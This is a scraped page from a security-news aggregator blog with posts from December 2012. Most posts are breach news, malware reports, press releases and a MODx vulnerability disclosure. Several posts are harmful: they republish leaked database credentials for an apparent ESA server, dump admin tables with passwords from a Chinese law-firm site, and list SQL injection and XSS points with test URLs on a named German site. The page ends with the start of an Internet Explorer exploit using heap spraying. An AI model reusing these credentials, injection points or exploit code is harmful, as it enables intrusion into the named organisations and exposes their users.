Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Stolen credentials, basic security lapses at core of 2012 breaches

December 26, 2012, 12:14 pm
$
0
0

A common thread could be weaved through the high profile data breaches that took place in 2012. Attackers are targeting basic security lapses and configuration errors or bypassing security systems altogether by using stolen account credentials to appear as a legitimate user on the network.
In this edition of the Security Squad podcast, the SearchSecurity editorial team discusses some of the lessons learned from the top breaches of 2012. From source code leaks tocredit card data, from poorly protected email and account credentials to intellectual property, attackers demonstrated that they can get into corporate systems and often remain there undetected for extended periods.  
Emerging password alternatives have some complex hurdles to climb before becoming mainstream. Multi-factor authentication is being implemented by more websites, but implementation needs to be rolled out systematically and more of an effort needs to be made to encourage people to more broadly adopt the protection.  
Security awareness training is essential in reducing social engineering attacks, but the training must be done in a way that makes it personal for the end user. Programs that teach employees how to protect their children and their banking activities could eventually foster awareness and translate into better protecting the company data, experts say.
Listen to the Security Squad podcast or right click and download the MP3.

Source link: http://searchsecurity.techtarget.com/news/2240175306/Stolen-credentials-basic-security-lapses-at-core-of-2012-breaches
Search

Detecting Compromised SSL Certificates Using Nessus

December 26, 2012, 12:16 pm
$
0
0

When Thieves Target SSL Certificates

SSL is one of the most commonly used protocols to provide encryption for a variety of different applications. As such, it has come under great scrutiny over the years.While SSL misconfiguration is commonplace, one of the more recent attacks against SSL is to steal the Certificate Authority (CA) certificate. (In a paper released in July 2012, NIST warned that this type of attack would increase). Access to this certificate allows the attacker to issue valid certificates, and in the case of a code-signing certificate, use it to sign malware. Malware executing with this level of trust increases the chances of successfully being installed on the system. Other CA certificates are used to generate website certificates used by attackers to impersonate secure access to a given website.
StealingCookies
Attackers stealing CA certificates has become more common. Don't think of it as stealing a cookie (or three), but more like attackers stealing the recipe to make their own cookies (and not the ones used between web browsers and web applications).
The attacks described above provide great return on investment (ROI) for attackers. By compromising one system and stealing the CA certificate, they can often turn around and compromise several more systems. The attacks tend to remain undetected for some time as they implement valid certificates that do not generate web browser errors. Fortunately, once the compromised certificate has been identified, it can be revoked, making future usage invalid. In addition, the offending certificate can be identified and revoked in your environment.

Finding Compromised Certificates

Nessus has several plugins to detect this type of vulnerability, including:

read more.....http://blog.tenablesecurity.com/2012/12/detecting-compromised-ssl-certificates-using-nessus.html

Ransomware: Extorting Money by Panic and Pressure

December 26, 2012, 12:18 pm
$
0
0

We have blogged in the past about Ransomware being a growing menace and that ONE SHOULD NOT PAY RANSOM if affected. Ransomware has now raised its ugly head up once again. Writers of Trojan.Ransomlock.G(a.k.a. Reveton) have updated their locking screen to induce panic and to blackmail the user into paying ransom.
Recently, blogger Kafeine found a ransomware sample which threatens to format and wipe all the documents on the compromised system if the user attempts to unlock the computer manually.
 
Figure 1. New Trojan.Ransomlock.G lock screen
 
Symantec Security Response has analyzed the malware sample and did not find any code related to this wiper functionality. In our tests we also manually removed the ransomware from the system and unlocked the computer without any formatting or files being deleted.

read more......http://www.symantec.com/connect/blogs/ransomware-extorting-money-panic-and-pressure

Pharmaceutical scammers spamvertise YouTube themed emails, entice users into purchasing counterfeit drugs

December 26, 2012, 1:51 pm
$
0
0

Pharmaceutical scammers are currently spamvertising a YouTube themed email campaign, attempting to socially engineer users into clicking on the links found in the legitimately looking emails.
Upon clicking on the fake YouTube personal message notification, users are redirected to a website reselling popular counterfeit drugs. The cybercriminals behind the campaign then earn revenue through an affiliate network.
More details:
Sample screenshot of the spamvertised email:
Pharmaceutical_Scam_Email_Spam_YouTube
Once users click on the link found in the email, they’re redirected to the following holiday-themed pharmaceutical web site:
Pharmaceutical_Scam_Email_Spam_YouTube_01
Spamvertised URL:
hxxp://roomwithaviewstudios.com/inherits.html
Landing URL:
hxxp://canadapharmcanadian.net – 109.120.138.155
The following fraudulent pharmaceutical sites have also been known to respond to the same IP (109.120.138.155):
tabletlevitripad.com – 95.58.254.74 – Email: hayes@ca4.ru ; Name servers:NS1.GENERICSWELLOCH.COM (93.99.136.42); NS2.XCILE.RU (61.177.184.98)
carewiski.com – Email: pawnbroker@carewiski.com
garciniaherbal.com – Email: sonseeahray@garciniaherbal.com ; Name servers:NS1.OMECT.RU (93.99.136.42); NS2.ZORNY.RU (61.177.184.98)
benghazilispharm.com – 84.22.104.123 – Email: cargreaves@benghazilispharm.com ; Name servers:NS1.BENGHAZILISPHARM.COM (58.42.251.237); NS2.BENGHAZILISPHARM.COM (221.207.50.84)
canadawelcanadian.com – Email: simeao@canadawelcanadian.com ; Name servers:NS1.CLUL.RU (93.99.136.42); NS2.TLAH.RU (221.207.50.84)
centprescription.com – 84.22.104.123 – Email: tremon@centprescription.com ; Name servers:NS1.CENTPRESCRIPTION.COM (93.99.136.42); NS2.CENTPRESCRIPTION.COM (60.28.145.226)
bloodgenerics.com – 84.22.104.123 – Email: milroy@bloodgenerics.com ; Name servers:NS1.BLOODGENERICS.COM (93.99.136.42); NS2.BLOODGENERICS.COM (125.16.213.251)
tabletgenerics.com – 95.58.254.74 – Email: brosilow@tabletgenerics.com ; Name servers:NS1.TABLETGENERICS.COM (125.16.213.251); NS2.TABLETGENERICS.COM (221.207.50.84)
drugenericsmeds.com – 84.22.104.123 – Email: moody@ppmail.ru ; Name servers:NS1.DRUGENERICSMEDS.COM (93.99.136.42); NS2.DRUGENERICSMEDS.COM (125.16.213.251)
drugherbalpills.com – 84.22.104.123 – Email: courtier@drugherbalpills.com ; Name servers:NS1.OHICS.RU (93.99.136.42); NS2.SIEW.RU (60.28.145.226)
Fortunately, during the time of testing the responsiveness of the site, it was desperately trying to remain online, which prevented the socially engineered users from initiating a transaction through it. However, this is sadly an isolated incident. According to recently published research, hundreds of thousands of US-based users click on links found in these types of fraudulent emails, and actually add counterfeit drugs to their shopping carts. The vibrant cybercrime ecosystem is in fact so advanced that, in order to stimulate the affiliate network participants into converting more traffic into actual customers, they even hold annual contests aiming to build a loyal community of network participants.
This isn’t the first time that we’ve intercepted attempts by pharmaceutical scammers to socially engineer potential customers into clicking on the links found in legitimately looking emails. In the past, we’ve found fake Google Pharmacies and emails impersonating YouTube and Twitter, as well as Facebook Inc., in an attempt to add more authenticity and legitimacy to their campaigns.
We expect to see more of these campaigns in 2013, with a logical peak over the next couple of days, so watch what you click on, don’t enter your credit card details on websites found in spam emails, and never bargain with your health.
You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on  Twitter.

ESA EUROPEAN SPACE AGENCY LEAK BY LULZSEC CHILE

December 26, 2012, 2:38 pm
$
0
0
As always this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the exploit .Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The Breach is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.



ESA EUROPEAN SPACE AGENCY BY LULZSEC CHILE


SERVER CONFIGURACION:

server=ida.esac.esa.int
port=4100
user=isopma
password=archive
database=Publications
table=iasd_line
lineDictionary=/home/voops/webapps/slap/conf/LineDictionary.xml

Tomcat/5.5.33 APACHE

http://esavo02.esac.esa.int:8080/




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Facebook Camera App Vulnerable to Man in The Middle Attack

December 26, 2012, 2:41 pm
$
0
0

Egypt-based security researcher reported that Facebook Camera App for
mobiles are Vulnerable to Man in The Middle Attack, that allow an
attacker to tap the network and hijack Camera users accounts and
information like email addresses and passwords can be stolen.

Mohamed Ramadan trainer with Attack-Secure, who previously reported us
about similar vulnerability in Etsy app for iPhone

Mohamed explains "The problem is that the app accepts any SSL
certification from any source, even evil SSL certifications, and this
enables any attacker to perform man in the middle attacks against
anyone who uses the Facebook Camera app for IPhone. This means that
the application doesn’t warn the user if someone in the same (Wi-Fi
network) is trying to hijack his or her Facebook account."

Facebook suggest users to upgrade the Camera application To Version
1.1.2.


read more.....http://thehackernews.com/2012/12/facebook-camera-app-vulnerable-to-man.html

OPTICUM GMBH Site Vulnerabilities (Scan)

December 26, 2012, 3:58 pm
$
0
0

http://www.opticum-gmbh.de Scan Report

Made By H3Cio5.Brain


Basic Information
VersionNULL
ServerApache/2.2.22
WWWRootNULL
userNULL
IsAdmin-1
DatabaseNULL
Sa_PasswordHashNULL

Vulnerability Result
No.1
ReferURLhttp://www.opticum-gmbh.de/?y=6&PHPSESSID=99999999
ParameterPHPSESSID=99999999
TypeString
KWordActionURLOPTICUM
VulnerabilityURL SQL INJECTION

No.2
ReferURLhttp://www.opticum-gmbh.de/
Parameterprzekazanyemail
TypePOST
KWordActionURLhttp://www.opticum-gmbh.de/newsletter.php^PHPSESSID=d669b960723a5f3dfddc73a0af56e62a&przekazanyemail=WCRTESTINPUT000001<>%3c%3e%253c%253e
VulnerabilityCross Site Scripting(Form)

No.3
ReferURLhttp://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=&s=2
Parameterhdsd
TypeGET
KWordActionURLhttp://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=WCRTESTINPUT000003<>%3c%3e%253c%253e&p1=&filtrate=&s=2
VulnerabilityCross Site Scripting(URL)

No.4
ReferURLhttp://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=&s=2
Parameterp1
TypeGET
KWordActionURLhttp://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=WCRTESTINPUT000004<>%3c%3e%253c%253e&filtrate=&s=2
VulnerabilityCross Site Scripting(URL)

No.5
ReferURLhttp://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=&s=2
Parameterfiltrate
TypeGET
KWordActionURLhttp://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=WCRTESTINPUT000005<>%3c%3e%253c%253e&s=2
VulnerabilityCross Site Scripting(URL)

Proof Of Concept - SQL INJECTION
ParameterValue
URLhttp://www.opticum-gmbh.de/?y=6&PHPSESSID=99999999
RequestTypeGET
DatabaseTypeSQLServer
InjectionTypeString
GettingDataByBlind




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Chinese Site -xiaobin.com.cn SQLi (Leak)

December 26, 2012, 4:03 pm
$
0
0

As always this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the Chinese site compromise .Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,
The Breach is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.






Vuln found by xjoker and (REL) by xJoker xDDDDD

http://www.xiaobin.com.cn/  <<<<<<VULN Site!!!



_______________________________________________________________________

Table: admin

telephonecontentadminnameemailpasswordidtitle
64444975twenthdeng@163.com123456
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607
010-63039425xblawyer@xiaobin.com.cn706607

___________________________________________________________________________________

Table: News

titletelephonecontentadminnameemailpasswordid
6��24����������ʦ����������ʡ�����вμӡ�����010-63039425xblawyer@xiaobin.com.cn70660782
��Ƹ��Ϣ010-63039425xblawyer@xiaobin.com.cn70660792
������ʿӦ���μ��й������ѧ����һ������ʵ�����ֻ�010-63039425xblawyer@xiaobin.com.cn70660793
��Ƹ�ز�רְ��Ա010-63039425xblawyer@xiaobin.com.cn70660794
����������ʦִҵ��ɫ�����ܿͻ�����010-63039425xblawyer@xiaobin.com.cn70660795
����������������ʦӦ����˾�����л�ȫ����ʦ���������ڿ�010-63039425xblawyer@xiaobin.com.cn706607100
����������������ʦӦ���μӡ�١�����̷���չ���������ʽ��١�����ͭ�������ʽ��010-63039425xblawyer@xiaobin.com.cn706607101
����������������ʦ����١�����̷���չ����,����١�ᡪ��������ר�ѧ��010-63039425xblawyer@xiaobin.com.cn706607102
��������ʦ�����ѧ����¥���֡��ز���������ʵ�����ֻᡱ010-63039425xblawyer@xiaobin.com.cn706607103
���ز���������ʵ�����ֻᡱ����ʵ��010-63039425xblawyer@xiaobin.com.cn706607104


________________________________________________________________________

Table: Company


telephonetextadminnamepasswordid
010-63039425xb             706607aservice
010-63039425xb          706607cominfo
010-63039425xb      706607cservice
010-63039425xb706607eservice
010-63039425û������xb706607hzba
010-63039425û������xb706607hzhb
010-63039425xb706607jxj
010-63039425û������xb706607ywly_jdal_fdckf
010-63039425û������xb706607ywly_jdal_gs
010-63039425û������xb706607ywly_jdal_ht



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Search

Innovative VPN Routers Help Increase Internet Privacy for Home Users

December 27, 2012, 3:14 am
$
0
0

As concerned consumers turn to VPN for privacy, Sabai Technology puts easiest to use VPN Routers on post-holiday discount.


I recommend Sabai Technology VPN Routers to everyone and anyone. They are very reliable and the tech support is one of the best I have ever seen.
Simpsonville, SC (PRWEB) December 26, 2012

December has been a tough month for internet security geeks. Between the authoritarian win at Dubai’s International Telecommunication Union conference and the continued crack down of the “Great Firewall” in China, even everyday users are beginning to take notice that big brother could be watching.
These trends are causing a rise in consumer Virtual Private Networks (VPN) use from providers like StrongVPN. Traditionally used for business, the privacy, security, and anonymity VPN affords can also appeal to home users looking to protect themselves from the prying eyes of the government or the hacker next door.
However, to extend this privacy to an entire network requires a specialized VPN Router, which historically, are a user’s nightmare in both usability and price. Bucking that trend is Sabai Technology, using brand-name favorite’s like the Linksys E4200 and installing a customized VPN operating system, Sabai OS, with features like Dual Gateway which allows a user to run local and VPN connections from a single router.
For users looking to increase the security of their home network in 2013, Christmas isn’t quite over. Sabai Technology is featuring two of their most popular models, the E3000 and E4200, both manufactured by Linksys, in a post-holiday sale. All Sabai Technology routers come with the Sabai OS pre-installed and boast a 5-minute setup process, extending a single VPN service account to every networked device in the user’s home.
One security conscience Sabai customer says, “I recommend Sabai Technology VPN Routers to everyone and anyone. They are very reliable and the tech support is one of the best I have ever seen.”
Sabai Technology has been called one of the “Technologies That Will Change the World,” and consumers seem to agree. The company has reached record sales in 2012, which they are using to fuel the development fire. “We are looking forward to 2013. Customers new and old are going to see increased functionality and brand new offerings. People will want to be a part of this,” says Sabai President William Haynes. With just a handful of sales promotions a year, it appears that now is a great time to check on your home internet security.
Sabai Technology is a VPN networking solution for the every-man, offering easy to use VPN Routers that work with some of the largest VPN service providers in the world. Customers use Sabai's products to extend their PPTP or OpenVPN account to multiple devices and utilize VPN services on products that aren't otherwise accessible. For more information, visit http://sabaitechnology.com.

PolicyPak Software Delivers Security and Lockdown Management for FoxIT Reader

December 27, 2012, 3:15 am
$
0
0

The new pak gives IT admins the ability to manage, lockdown and remediate the PDF reader.

If you’re going to be deploying FoxIT Reader to all of your client machines, you’re going to want to make sure that the application itself is locked down and secure.
(PRWEB) December 26, 2012

PolicyPak Software, a leader in desktop management software, has released their latest software pak, which streamlines the process for IT admins to configure and control settings for FoxIT Reader.
The pre-configured Pak used in conjunction with PolicyPak Professional software allows IT admins to turn off automatic updates, disable dangerous items like Javascript (the source of many security related attacks) and ensure that "Enable Safe Reading Mode" is always turned on. The PolicyPak solution is a true Group Policy extension and not just an "ADM" template.
"If you’re going to be deploying FoxIT Reader to all of your client machines, you’re going to want to make sure that the application itself is locked down and secure. Without PolicyPak, you’ve got nothing performing any remediation on this application. Users can just work around your security settings and steamroll over you," says Jeremy Moskowitz, the founder of PolicyPak. He is an expert on Group Policy.
PolicyPak Professional customers have free access to the FoxIT Reader pak, as well as dozens of other pre-configured applications. Some of the most popular applications offer solutions for Java, Flash, Firefox and Shockwave. Solutions are also available for less popular applications and homegrown applications with the PolicyPak Design Studio.
IT Admins can find out more about PolicyPak by attending a Group Policy Webinar at the PolicyPak Website, or by calling (800) 883-8002.
About PolicyPak Software:
PolicyPak Software (http://www.policypak.com) is the leader in application compliance and desktop management tools for Active Directory. The software enables IT pros to deliver, lockdown and remediate settings for desktops, laptops, VDI sessions, company devices, as well as personal “BYOD” devices. PolicyPak was founded by desktop management expert and Microsoft Group Policy MVP Jeremy Moskowitz.

Three Pieces of Malware Found to Target Korean Gamers

December 27, 2012, 3:31 am
$
0
0

esearchers from Microsoft’s Malware Protection Center have analyzed three pieces of malware that appear to be utilized to target gamers from Korea, particularly users who play card games.

Experts believe that the malware authors are utilizing their creations to steal various pieces of information from their victims, but some of the techniques might also be utilized to cheat.

Trojan:Win32/Urelas.C, a malware developed in Delphi, takes screenshots of the victim’s gaming activity. These screenshots are sent to a remote server in various image formats, including JPEG, TIFF and BMP.


 Besides making screenshots – which could be utilized by the cybercriminals to observe the gaming behavior of the victims or to cheat –, Urelas.C also collects valuable information from the infected computers.

Trojan:Win32/Gupboot.A is the second piece of malware that’s currently targeting Korean players. This one’s more sophisticated since it contains a bootkit component and code from Urelas to overwrite the master boot records (MBR).

“Part of this malware’s payload is to allow kernel-mode hooking to hide the malware process and its suspicious activities from the user, making the system run in a compromised state. Like most malware that overwrites the MBR, the main intent is to use the malware’s 16-bit loader to execute the payload,” Marianne Mallen of MMPC explains.


read more....http://news.softpedia.com/news/Three-Pieces-of-Malware-Found-to-Target-Korean-Gamers-317178.shtml?utm_source=dlvr.it&utm_medium=twitter

New Year’s Resolutions for Cyber Security

December 27, 2012, 3:33 am
$
0
0

January is often viewed as a chance to start fresh and to improve on the previous year by making modest resolutions that hopefully we keep throughout the year.

For credit unions, January presents an excellent opportunity to step back and consider ways to strengthen our overall security posture. Following that review, our New Year’s resolutions will no doubt include something beyond a promise to eat better and exercise more.

Perhaps a resolution to invest in security training, more effectively probe for vulnerabilities, or re-evaluate monitoring of critical IT systems?

The following ideas, based on situations we have encountered in our core processing service, should contribute to a brighter, more successful and secure year ahead.

Invest in Security Training

A major security takeaway from last year: The realization that great information security requires genuine enthusiasm and a strong, ongoing commitment to learning.  Can you imagine a stagnant security effort protecting your credit union from threats? I can’t.

As a New Year’s resolution, consider expanding your security training to include all staff. Ask your senior management team to encourage training activities, and to ensure that the training is appropriate for the trainees.  There are many flavors of security training – from awareness to deep system analysis. Here are a few recommendations:

For Everyone – Security Awareness Training

Far too often, human beings are the weakest link in our security chain. No wonder that security awareness training is a critical component of any successful security program. Training enables you to educate the entire staff about current issues – from phishing attacks to the importance of shredding sensitive documents.

It’s also a great opportunity to remind staff to treat sensitive information as if it were their own, and to educate them on the significant costs associated with security breaches. Everyone should walk away with a fresh appreciation for the importance of security to your organization.

For Security Staff

Security personnel should consider taking the General Security (GSEC) course and certification offered by the SANS Institute, the most trusted source for information security training and security certification in the world.  The course covers the most important topics in information security, from defense-in-depth to Web application security. It’s a great foundation for addressing security challenges in a broad range of business situations.

For the Techies

Your technical staff should be enriching their skills with courses and certifications offered by the SANS Institute and International Council of E-Commerce Consultants (EC-Council). These courses dig into operating system security, network security and firewalls, incident handling, penetration testing, wireless security and much more. Consider using these certifications to build expertise where you need it most.

For Auditing Staff

Greater familiarity with information technology and security issues can only help your personnel involved in auditing and IT governance. Consider courses offered by ISACA (Information Systems Audit and Control Association), ISC2 and the SANS Institute. Certifications earned through these programs can strengthen your auditing capability.

Probe for Vulnerabilities

Read more.....http://www.cutimes.com/2012/12/26/new-years-resolutions-for-cyber-security?ref=hp&utm_source=twitterfeed&utm_medium=twitter

What criminals do with stolen passwords

December 27, 2012, 3:34 am
$
0
0

Not long ago, PCs compromised by malware were put to a limited number of fraudulent uses, including spam, click fraud and denial-of-service attacks. These days, computer crooks are extracting and selling a much broader array of data stolen from hacked systems, including passwords and associated email credentials tied to a variety of online retailers.
At the forefront of this trend are the botnet creation kits like Citadel, ZeuS andSpyEye, which continue make it simple for miscreants to assemble collections of compromised machines. Botnets are networks of infected or zombie computers which obey a remote command and control master. The term is also used to define botnet malware which infects the computers. By default, most bot malware will extract any passwords stored in the victim PC's browser, and will intercept and record any credentials submitted in web forms, such as when a user enters his credit card number, address and other details at an online retail shop.
Some of the most valuable data extracted from hacked PCs is bank login information. But non-financial logins also have value, particularly for shady online shops that collect and resell this information.

This shop sells credentials to active accounts at dozens of leading e-retailers. Photo: KrebsOnSecurity
Logins for everything from Amazon.com to Walmart.com often are resold — either in bulk, or separately by retailer name — on underground crime forums. A miscreant who operates a Citadel botnet of some size (a few thousand bots) can expect to quickly accumulate huge volumes of logs - records of user credentials and browsing history from victim PCs. Without even looking that hard, I found several individuals on the underground Underweb forums selling bulk access to their botnet logs. For example, one Andromeda bot user was selling access to 6 gigabytes of bot logs for a flat rate of $US150 ($144).


Read more: http://www.watoday.com.au/it-pro/security-it/what-criminals-do-with-stolen-passwords-20121227-2bx65.html#ixzz2GFdbaDr0

Huge rise in social media 'crimes'

December 27, 2012, 12:49 pm
$
0
0

The number of alleged crimes involving Facebook and Twitter has increased nearly eight-fold in four years, according to police figures.

There were 653 people charged in 2012 out of 4,908 offences reported to 29 forces in England, Scotland and Wales.

Police chiefs said the figures demonstrate a new challenge.

Last week, interim guidelines were issued, aimed at reducing the number of charges in England and Wales, after a string of controversial court cases.

The conviction of Paul Chambers in 2010 for joking on Twitter about blowing up Robin Hood Airport in South Yorkshire was widely condemned and eventually quashed.

The latest statistics were released by the police under the Freedom of Information Act.

Continue reading the main story

Start Quote

The guidance means some people could avoid trial if they are sorry for criminal comments posted while drunk”

Dominic Casciani
Home affairs correspondent
Fewer Twitter prosecutions likely
In 2008, when the level of social network activity was much lower, there were 556 reports of alleged crimes with 46 people charged.

By this year that figure had risen to 4,908 allegations and 653 charged.

Chief Constable Andy Trotter of the Association of Chief Police Officers said it was important that police prioritised social networking crimes which caused genuine harm.


read more....http://www.bbc.co.uk/news/uk-20851797

Record-breaking 17.4 million Android and iOS devices activated on Christmas Day; tablets top smartphones

December 27, 2012, 2:28 pm
$
0
0
 Android iOS Activations

More Android and iOS devices were activated on Christmas Day this year than on any other day. According to analytics firm Flurry, 17.4 million Android and iOS devices were activated during the holiday, an increase of 332% compared to an average of 4 million activations per day. This year’s numbers were found to be more than two and a half times larger than Christmas Day last year, which saw 6.8 million devices activated. Once their smartphones and tablets were turned on, consumers collectively downloaded 328 million applications.

read more.......http://bgr.com/2012/12/27/android-ios-activations-christmas-day-270963/
Search

MODx Revolution CMS Brute Force (BF), Cross-Site Request Forgery (CSRF), Abuse of Functionality (AOF) and Insufficient Anti-Automation (IAA) Vulnerabilities

December 27, 2012, 2:49 pm
$
0
0

I want to warn you about multiple vulnerabilities in MODx Revolution.

These are Brute Force, Cross-Site Request Forgery, Abuse of Functionality
and Insufficient Anti-automation vulnerabilities in MODx. It's about 2.x
(Revolution) versions of MODx. In 0.x and 1.x (Evolution) versions of MODx
CMS there are much more holes, about which I've wrote earlier. Developers
changed the code of their CMS in 2.x versions, which decreased number of
vulnerabilities (like DoS hole, but Login Enumeration hole just changed into
different one). As I've found at tested web site - one Ukrainian government
site, also there were multiple XSS holes on it (which are still not fixed),
which were not related to core of engine, it was custom code.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of MODX Revolution (2.x versions of engine).

----------
Details:
----------

Brute Force (WASC-11):

In login form (http://site/manager/) there is no protection from Brute Force
attacks.

Cross-Site Request Forgery (WASC-09):

Lack of captcha in login form (http://site/manager/) can be used for
different attacks - for CSRF-attack to login into account (remote login - to
conduct attacks on vulnerabilities inside of account), for automated
entering into account, for phishing and other automated attacks. Which you
can read about in the article "Attacks on unprotected login forms"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).

Abuse of Functionality (Login Enumeration) (WASC-42):

In login form (http://site/manager/) Login Enumeration is possible.
Different messages are shown for correct and incorrect logins.

Insufficient Anti-automation (WASC-21):

In login form there is no protection against automated request, which allow
to picking up logins in automated way by attacking on login function and by
attacking on password recovery function it's possible to reveal users'
emails. Both functionals are placed at the same page.

------------
Timeline:
------------

2012.06.28 - announced at my site about MODx Evolution.
2012.06.28 - informed developers about the first part of vulnerabilities in
MODx Evolution.
2012.06.30 - informed developers about the second part of vulnerabilities in
MODx Evolution.
2012.07.26 - announced at my site about MODx Revolution.
2012.07.28 - informed developers about vulnerabilities in MODx Revolution
and reminded about previous two letters.
2012.07.28-2012.10.31 - during conversation with developers about MODx
Revolution, I was constantly reminding them, that I've sent them info about
holes in Evolution and I can resent them, because it was clear that they
missed it (they only were answering concerning Revolution).
2012.11.02 - after developers said they want to see this information (missed
by them in June), I've resent the first two letters to the developers.
2012.12.27 - disclosed at my site (http://websecurity.com.ua/5981/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Kaspersky Lab Boosts Linux Mail Security

December 27, 2012, 2:58 pm
$
0
0

Kaspersky Lab ZAO gave its Kaspersky Security for Linux Mail Server a few strong tweaks in the security area with an update that bolsters protection against spam and malware spread by e-mail, giving the channel a competitive edge when breaking into growing open-source security niches.

Kaspersky’s refreshed security solution, which serves Linux and FreeBSD mail servers, contains revamped security mechanisms that partners can use to gain ground in competitive open-source markets. One of the biggest improvements is a zero-day exploit and targeted attack shield, dubbed ZETA Shield technology, designed to detect and block unknown and increasingly sophisticated advanced persistent threats (APTs) delivered via e-mail attachments.

The solution touts a new enforced antispam update service (EASUS) technology, which pushes updates from the Kaspersky cloud to the customers in real time. The revamped spam technology addresses what Kaspersky calls the “hit and run” tactic used by cybercriminals to bombard victims with at least half of the spam assault in the first 10 minutes.

The security solution a features a new cloud-assisted content reputation filtering system aimed at combating spam and reducing false positives. The content reputation technology fragments e-mail content, then analyses and compares the fragments with known samples of unwanted e-mail.


read more..............http://channelnomics.com/2012/12/27/kaspersky-lab-boosts-linux-mail-security/

Ransomware Takes New Turn for Money - Online Surveys

December 27, 2012, 3:29 pm
$
0
0

A new ransomware scam has taken an interesting twist – rather than simply demanding payment, the attackers want the victims to fill out a survey.

It is a new tack for a scam that traditionally relies on threats and intimidation, and perhaps a foreshadowing of what is to come, noted Malwarebytes Malware Intelligence Lead Adam Kujawa.

"The users are asked to fill out demographic information, personal information - [such as] name, address, phone number - and near the end of the survey, are required to click on "special offers" from the advertisers that usually includes something along the lines of "Pay $1 for a year free subscription to XYZ magazine" or "Try a month free trial of some music download site for only $2.50"," he said. "The survey justifies these offers by offering to the user a [fake] $25 or $50 gift certificate to somewhere like Walmart or BestBuy."

read more............http://www.securityweek.com/ransomware-takes-new-turn-money-online-surveys?utm_source=dlvr.it&utm_medium=twitter

Internet Explorer Select Element RCE - CVE-2011-1999 ?

December 27, 2012, 3:42 pm
$
0
0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" id="doctype1">
<html>
<head>
<script type="text/javascript">

function int_to_hex(dword)
{
var d=Number(dword).toString (16);
while(d.length<8) d='0'+d;
return unescape('%u'+d.substr(4,8)+'%u'+d.substr(0,4));
};

spraybase = 0x0a0a0024;

